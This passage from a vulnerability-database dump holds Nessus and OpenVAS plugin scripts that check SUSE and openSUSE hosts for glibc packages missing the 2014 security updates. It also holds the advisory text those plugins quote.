reference:\"glibc-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.18-4.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:13", "bulletinFamily": "scanner", "description": "This glibc update fixes a critical privilege escalation problem and\nthe following security and non-security issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. 
(CVE-2014-4043)\n\n - bnc#860501: Use O_LARGEFILE for utmp file.\n\n - bnc#842291: Fix typo in\n glibc-2.5-dlopen-lookup-race.diff.\n\n - bnc#839870: Fix integer overflows in malloc.\n (CVE-2013-4332)\n\n - bnc#834594: Fix readdir_r with long file names.\n (CVE-2013-4237)\n\n - bnc#824639: Drop lock before calling malloc_printerr.\n\n - bnc#801246: Fix buffer overrun in regexp matcher.\n (CVE-2013-0242)\n\n - bnc#779320: Fix buffer overflow in strcoll.\n (CVE-2012-4412)\n\n - bnc#894556 / bnc#894553: Fix crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656,\n bnc#894553, bnc#894556, BZ#17325, BZ#14134)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2014-1128-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83638", "published": "2015-05-20T00:00:00", "title": "SUSE SLES10 Security Update : glibc (SUSE-SU-2014:1128-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2014:1128-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83638);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-4412\", \"CVE-2012-6656\", \"CVE-2013-0242\", \"CVE-2013-4237\", \"CVE-2013-4332\", \"CVE-2014-4043\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(55462, 57638, 61729, 62324, 68006, 68983, 69470, 69472, 69738);\n\n script_name(english:\"SUSE SLES10 Security Update : glibc (SUSE-SU-2014:1128-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The 
remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This glibc update fixes a critical privilege escalation problem and\nthe following security and non-security issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. (CVE-2014-4043)\n\n - bnc#860501: Use O_LARGEFILE for utmp file.\n\n - bnc#842291: Fix typo in\n glibc-2.5-dlopen-lookup-race.diff.\n\n - bnc#839870: Fix integer overflows in malloc.\n (CVE-2013-4332)\n\n - bnc#834594: Fix readdir_r with long file names.\n (CVE-2013-4237)\n\n - bnc#824639: Drop lock before calling malloc_printerr.\n\n - bnc#801246: Fix buffer overrun in regexp matcher.\n (CVE-2013-0242)\n\n - bnc#779320: Fix buffer overflow in strcoll.\n (CVE-2012-4412)\n\n - bnc#894556 / bnc#894553: Fix crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656,\n bnc#894553, bnc#894556, BZ#17325, BZ#14134)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=779320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=834594\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=839870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=842291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=860501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=190862be14e3ed91b361e0b0a66e292a\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d2f2bff\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-4412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-0242/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4237/\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4332/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4043/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-5119/\"\n );\n # https://www.suse.com/support/update/announcement/2014/suse-su-20141128-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e04549f0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! 
preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-devel-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-html-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-i18ndata-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-info-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-locale-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-profile-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"nscd-2.4-31.77.112.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if 
(tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851101", "title": "SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1129_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851101\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:03:09 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This glibc update fixes a critical privilege escalation problem and two\n additional issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n\n * bnc#836746: Avoid race between {, __de}allocate_stack and\n __reclaim_stacks during fork.\n\n * bnc#844309: Fixed various overflows, reading large /etc/hosts or\n long names. (CVE-2013-4357)\n\n * bnc#894553, bnc#894556: Fixed various crashes on invalid input in\n IBM gconv modules. 
(CVE-2014-6040, CVE-2012-6656)\");\n\n script_tag(name:\"affected\", value:\"glibc on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1129_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.11.3~17.45.53.1\", rls:\"SLES11.0SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:18", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2014-09-12T00:00:00", "id": "OPENVAS:1361412562310850610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850610", "title": "SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1115_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850610\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-12 05:56:57 +0200 (Fri, 12 Sep 2014)\");\n script_cve_id(\"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for glibc openSUSE-SU-2014:1115-1 (glibc)\");\n script_tag(name:\"insight\", value:\"glibc was updated to fix three security\nissues:\n\n - A directory traversal in locale environment handling was fixed\n (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could be used for\n code execution (CVE-2014-5119, bnc#892073, GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules (CVE-2014-6040,\n bnc#894553, BZ #17325)\");\n script_tag(name:\"affected\", value:\"glibc on openSUSE 13.1, openSUSE 12.3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2014:1115_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced 
advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debugsource\", rpm:\"glibc-debugsource~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo\", rpm:\"glibc-devel-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static\", rpm:\"glibc-devel-static~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra\", rpm:\"glibc-extra~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-extra-debuginfo\", rpm:\"glibc-extra-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo\", rpm:\"glibc-locale-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd-debuginfo\", rpm:\"nscd-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo\", rpm:\"glibc-utils-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debugsource\", rpm:\"glibc-utils-debugsource~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete\", rpm:\"glibc-obsolete~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-obsolete-debuginfo\", rpm:\"glibc-obsolete-debuginfo~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-32bit\", rpm:\"glibc-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", 
rpm:\"glibc-devel-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-debuginfo-32bit\", rpm:\"glibc-devel-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-static-32bit\", rpm:\"glibc-devel-static-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-debuginfo-32bit\", rpm:\"glibc-locale-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-32bit\", rpm:\"glibc-utils-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils-debuginfo-32bit\", rpm:\"glibc-utils-debuginfo-32bit~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.17~4.13.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.17~4.13.1\", 